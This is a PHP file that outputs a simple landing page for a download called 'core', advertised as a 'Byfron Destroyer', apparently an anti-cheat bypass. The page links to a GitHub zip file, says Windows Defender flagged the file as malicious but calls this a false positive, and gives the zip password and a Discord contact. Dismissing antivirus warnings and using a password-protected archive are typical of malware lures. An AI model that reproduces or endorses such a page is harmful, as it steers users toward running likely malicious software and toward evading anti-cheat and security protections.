<?php
echo '<!DOCTYPE html>';
echo '<html style="font-size: 16px;" lang="en"><head>';
echo '<meta name="viewport" content="width=device-width, initial-scale=1.0">';
echo '<meta charset="utf-8">';
echo '<meta name="keywords" content="core​">';
echo '<meta name="description" content="">';
echo '<title>Home</title>';
echo '<link rel="stylesheet" href="nicepage.css" media="screen">';
echo '<link rel="stylesheet" href="index.css" media="screen">';
echo '<script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>';
echo '<script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>';
echo '<meta name="generator" content="Nicepage 6.15.2, nicepage.com">';
echo '<link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">';
echo '';
echo '';
echo '';
echo '<script type="application/ld+json">{';
echo '"@context": "http://schema.org",';
echo '"@type": "Organization",';
echo '"name": ""';
echo '}</script>';
echo '<meta name="theme-color" content="#478ac9">';
echo '<meta property="og:title" content="Home">';
echo '<meta property="og:type" content="website">';
echo '<meta data-intl-tel-input-cdn-path="intlTelInput/"></head>';
echo '<body data-home-page="Home.html" data-home-page-title="Home" data-path-to-root="./" data-include-products="false" class="u-body u-xl-mode" data-lang="en">';
echo '<section class="u-align-left u-clearfix u-image u-shading u-section-1" id="sec-8019" data-image-width="1920" data-image-height="1080">';
echo '<div class="u-clearfix u-sheet u-sheet-1">';
echo '<h1 class="u-align-left u-text u-text-default u-title u-text-1">core </h1>';
echo '<p class="u-align-left u-large-text u-text u-text-variant u-text-2">Byfron Destroyer. </p>';
echo '<h3 class="u-align-left u-text u-text-default u-text-3">Status: 🟢 </h3>';
echo '<img class="u-border-2 u-border-grey-75 u-image u-image-default u-image-1" src="images/image.png" alt="" data-image-width="500" data-image-height="254">';
echo '<a href="https://github.com/UNICORNSSUCK/UNICORNSREALLYSUCK/raw/main/CoreBootStrapper.zip" class="u-align-left u-border-none u-btn u-button-style u-gradient u-none u-btn-1">DOWNLOAD</a>';
echo '<h6 class="u-text u-text-default u-text-4">This was marked "malicious" from windows defender&nbsp;<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; its a false positive<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; dc: air_true<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Pass to the zip: 5x2';
echo '</h6>';
echo '</div>';
echo '</section>';
echo '';
echo '';
echo '';
echo '';
echo '<section class="u-backlink u-clearfix u-grey-80">';
echo '<p class="u-text">';
echo '<span></span>';
echo '<a class="u-link" href="" target="_blank" rel="nofollow">';
echo '<span></span>';
echo '</a>';
echo '</p>';
echo '</section>';
echo '';
echo '</body></html>';
?>